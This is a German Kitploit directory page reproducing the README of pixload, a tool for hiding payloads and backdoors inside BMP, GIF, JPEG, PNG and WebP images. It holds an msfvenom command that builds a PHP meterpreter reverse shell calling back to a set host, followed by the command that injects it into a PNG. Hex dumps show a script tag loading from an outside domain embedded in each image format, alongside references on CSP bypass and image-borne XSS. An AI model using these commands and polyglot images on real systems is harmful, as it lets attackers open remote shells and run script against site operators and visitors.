Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pixload — Werkzeuge zur Erstellung/Injektion von Bild-Payloads | Kitploit
Tools/GitHubGitHub/sighook/pixload
Payload-GenerierungWebanwendungs-ExploitationSteganografiePayload-Entwicklung
GitHubsighook/pixload

pixload

Werkzeuge zur Erstellung/Injektion von Bild-Payloads

Repository anzeigen
1.3k252vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

pixload -- Werkzeuge zum Erstellen von Bild-Payloads

BESCHREIBUNG

Sammlung von Werkzeugen zum Verstecken von Backdoors Erstellen/Injizieren von Payloads in Bilder.

Die folgenden Bildtypen werden derzeit unterstützt: BMP, GIF, JPG, PNG, WebP.

Über

Nützliche Referenzen zum besseren Verständnis von pixload und seinen Anwendungsfällen:

  • Bypassing CSP using polyglot JPEGs

  • Hacking group using Polyglot images to hide malvertising attacks

  • Encoding Web Shells in PNG IDAT chunks

  • An XSS on Facebook via PNGs & Wonky Content Types

  • Revisiting XSS payloads in PNG IDAT chunks

Wenn Sie einen Payload so kodieren möchten, dass das resultierende Binär-BLOB sowohl gültiger x86-Shellcode als auch eine gültige Bilddatei ist, empfehle ich Ihnen, hier und hier nachzusehen.

msfvenom

Wenn Sie einen Metasploit-Payload injizieren möchten, müssen Sie etwa Folgendes tun:

  1. Metasploit-Payload erstellen (z.B. php).
root@kitploit:~
$ msfvenom -p php/meterpreter_reverse_tcp \
	LHOST=192.168.0.1 LPORT=31337 -f raw 2>/dev/null > payload.php
  1. Bearbeiten Sie ggf. payload.php.

  2. Injizieren Sie payload.php in das Bild (z.B. png).

root@kitploit:~
$ pixload-png --payload "$(cat payload.php)" payload.png

EINRICHTUNG

Abhängigkeiten

Die folgenden Perl-Module werden benötigt:

  • GD

  • Image::ExifTool

  • String::CRC32

Installieren Sie diese Pakete auf Debian-basierten Systemen:

root@kitploit:~
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

Installieren Sie diese Pakete auf FreeBSD und DragonFlyBSD:

root@kitploit:~
doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32

Auf OSX beachten Sie bitte diesen Workaround (Danke an @iosdec).

Bauen und Installieren
root@kitploit:~
make install

Docker

root@kitploit:~
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload

WERKZEUGE

pixload-bmp

Hilfe
root@kitploit:~
$ pixload-bmp --help
root@kitploit:~
Verwendung: pixload-bmp [OPTION]... DATEI
Payload/Bösartigen Code in BMP-Bildern verstecken.

Obligatorische Argumente für lange Optionen sind auch für kurze Optionen obligatorisch.
  -P, --payload STRING   Payload für die Injektion festlegen
  -v, --version          Version anzeigen und beenden
  -h, --help             Hilfe anzeigen und beenden

Wenn die Ausgabedatei bereits existiert, wird der Payload in diese vorhandene Datei injiziert.
Andernfalls wird eine neue erstellt.
Beispiel
root@kitploit:~
$ pixload-bmp payload.bmp
root@kitploit:~
...... BMP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26

00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|
00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|
00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
00000030  2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com></s|
00000040  63 72 69 70 74 3e 3b                              |cript>;|
00000047

Siehe Handbuchseite pixload-bmp(1) für weitere Informationen.

pixload-gif

Hilfe
root@kitploit:~
$ pixload-gif --help
root@kitploit:~
Verwendung: pixload-gif [OPTION]... DATEI
Payload/bösartigen Code in GIF-Bildern verstecken.

Obligatorische Argumente für lange Optionen sind auch für kurze Optionen obligatorisch.
  -W, --pixelwidth  INTEGER   (hat keine Wirkung)
                              Pixelbreite für das neue Bild festlegen (Standard: 10799)
  -H, --pixelheight INTEGER   Pixelhöhe für das neue Bild festlegen (Standard: 32)
  -P, --payload     STRING    Payload für die Injektion festlegen
  -v, --version               Version anzeigen und beenden
  -h, --help                  Hilfe anzeigen und beenden

Die Option -W, --pixelwidth hat keine Wirkung, da pixload-gif die
Pixelbreiten-Bytes mit "/*"-Zeichen überschreibt, um das polyglotte GIF-Bild
vorzubereiten.

Wenn die Ausgabedatei bereits existiert, wird der Payload in diese vorhandene Datei
injiziert. Andernfalls wird eine neue mit der angegebenen Pixelbreite erstellt.
Beispiel
root@kitploit:~
$ pixload-gif payload.gif
root@kitploit:~
...... GIF Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.gif

[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

payload.gif: GIF image data, version 87a, 10799 x 32

00000000  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* .......|
00000010  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |...,.... . .....|
00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |................|
00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H............;*|
00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;<script src=|
00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|
00000060  73 63 72 69 70 74 3e 3b                           |script>;|
00000068

Siehe Handbuchseite pixload-gif(1) für weitere Informationen.

pixload-jpg

Hilfe
root@kitploit:~
$ pixload-jpg --help
root@kitploit:~
Verwendung: pixload-jpg [OPTION]... DATEI
Payload/Bösartigen Code in JPEG-Bildern verstecken.

Obligatorische Argumente für lange Optionen sind auch für kurze Optionen obligatorisch.
  -S, --section COM|DQT         Abschnitt für Payload-Injektion festlegen
  -P, --payload STRING          Payload für die Injektion festlegen
  -v, --version                 Version anzeigen und beenden
  -h, --help                    Hilfe anzeigen und beenden

Wenn die Ausgabedatei bereits existiert, wird der Payload in diese vorhandene Datei
injiziert. Andernfalls wird eine neue erstellt.
Beispiele
  1. Payload in Kommentarabschnitt injizieren:
root@kitploit:~
$ pixload-jpg -S com payload.jpg
root@kitploit:~
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into COMMENT
[✔] Payload was injected successfully

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1

00000000  ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |.....%<script sr|
00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|
00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |</script>...C...|
00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|
*
00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |................|
00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |................|
00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|
0000009e
  1. Payload in DQT-Tabelle injizieren:
root@kitploit:~
$ pixload-jpg -S dqt payload.jpg
root@kitploit:~
..... JPEG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into DQT table
[✔] Payload was injected succesfully

payload.jpg: JPEG image data, progressive, precision 8, 1x1, components 1

00000000  ff d8 ff db 00 43 00 01  01 01 01 01 01 01 01 01  |.....C..........|
00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|
00000020  01 01 01 01 3c 73 63 72  69 70 74 20 73 72 63 3d  |....<script src=|
00000030  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|
00000040  73 63 72 69 70 74 3e ff  c2 00 0b 08 00 01 00 01  |script>.........|
00000050  01 01 11 00 ff c4 00 14  00 01 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00  00 03 ff da 00 08 01 01  |................|
00000070  00 00 00 01 3f ff d9 01  01 11 00 ff c4 00 14 00  |....?...........|
00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |...........?..|
0000009e

Siehe pixload-jpg(1) für weitere Informationen.

pixload-png

Hilfe
root@kitploit:~
$ pixload-png --help
root@kitploit:~
Verwendung: pixload-png [OPTION]... DATEI
Payload/Bösartigen Code in PNG-Bildern verstecken.

Obligatorische Argumente für lange Optionen sind auch für kurze Optionen obligatorisch.
  -W, --pixelwidth  INTEGER   Pixelbreite für das neue Bild festlegen (Standard: 32)
  -H, --pixelheight INTEGER   Pixelhöhe für das neue Bild festlegen (Standard: 32)
  -P, --payload STRING        Payload für die Injektion festlegen
  -v, --version               Version anzeigen und beenden
  -h, --help                  Hilfe anzeigen und beenden

Wenn die Ausgabedatei bereits existiert, wird der Payload in diese vorhandene Datei
injiziert. Andernfalls wird eine neue mit der angegebenen Pixelbreite erstellt.
Beispiel
root@kitploit:~
$ pixload-png payload.png
root@kitploit:~
...... PNG Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.png

[>] Injecting payload into payload.png

[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND

[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 19 49 44 41 54 48 89  |...+......IDATH.|
00000040  ed c1 31 01 00 00 00 c2  a0 f5 4f ed 61 0d a0 00  |..1.......O.a...|
00000050  00 00 6e 0c 20 00 01 c8  a2 88 fe 00 00 00 00 49  |..n. ..........I|
00000060  45 4e 44 ae 42 60 82 00  00 00 00 00 00 00 00 00  |END.B`..........|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000c0  00 23 50 55 6e 4b 3c 73  63 72 69 70 74 20 73 72  |.#PUnK<script sr|
000000d0  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|
000000e0  3c 2f 73 63 72 69 70 74  3e eb fd 2e 9f 00 49 45  |</script>.....IE|
000000f0  4e 44                                             |ND|
000000f2

Siehe Handbuchseite pixload-png(1) für weitere Informationen.

pixload-webp

Hilfe
root@kitploit:~
$ pixload-webp --help
root@kitploit:~
Verwendung: pixload-webp [OPTION]... DATEI
Payloads/bösartigen Code in WebP-Bildern verstecken.

Obligatorische Argumente für lange Optionen sind auch für kurze Optionen obligatorisch.
  -P, --payload STRING   Payload für die Injektion festlegen
  -v, --version          Version anzeigen und beenden
  -h, --help             Hilfe anzeigen und beenden

Derzeit gibt es keine Möglichkeit, den Payload in ein vorhandenes WebP-Bild
zu injizieren. Es wird nur ein neues (minimales) WebP-Bild erstellt und Ihr
Payload wird hinein injiziert. Wenn die Ausgabedatei bereits existiert, wird
der Payload in das vorhandene Bild injiziert, aber dieses Bild wird beschädigt.
Beispiel
root@kitploit:~
$ pixload-webp payload.webp
root@kitploit:~
..... WebP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.webp

[>] Injecting payload into payload.webp
[✔] Payload was injected successfully

payload.webp: RIFF (little-endian) data, Web/P image

00000000  52 49 46 46 2f 2a 00 00  57 45 42 50 56 50 38 4c  |RIFF/*..WEBPVP8L|
00000010  ff ff ff 00 2f 00 00 00  10 07 10 11 11 88 88 fe  |..../...........|
00000020  07 00 2a 2f 3d 31 3b 3c  73 63 72 69 70 74 20 73  |..*/=1;<script s|
00000030  72 63 3d 2f 2f 65 78 61  6d 70 6c 65 2e 63 6f 6d  |rc=//example.com|
00000040  3e 3c 2f 73 63 72 69 70  74 3e 3b                 |></script>;|
0000004b

Siehe Handbuchseite pixload-webp(1) für weitere Informationen.

LIZENZ

WTFPL Version 2. Siehe LICENSE für weitere Informationen.

RECHTLICHER HAFTUNGSAUSSCHLUSS

Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Tools. Denken Sie daran, dass Angriffe auf Ziele ohne vorherige Zustimmung illegal und strafbar sind.

SPENDEN

  • BTC: bc1qj4g98svq6qh3q2ap37v52nsvusa76c3cnmcdmx

  • PAYPAL: [email protected]

Sehr geschätzt.

Tool herunterladen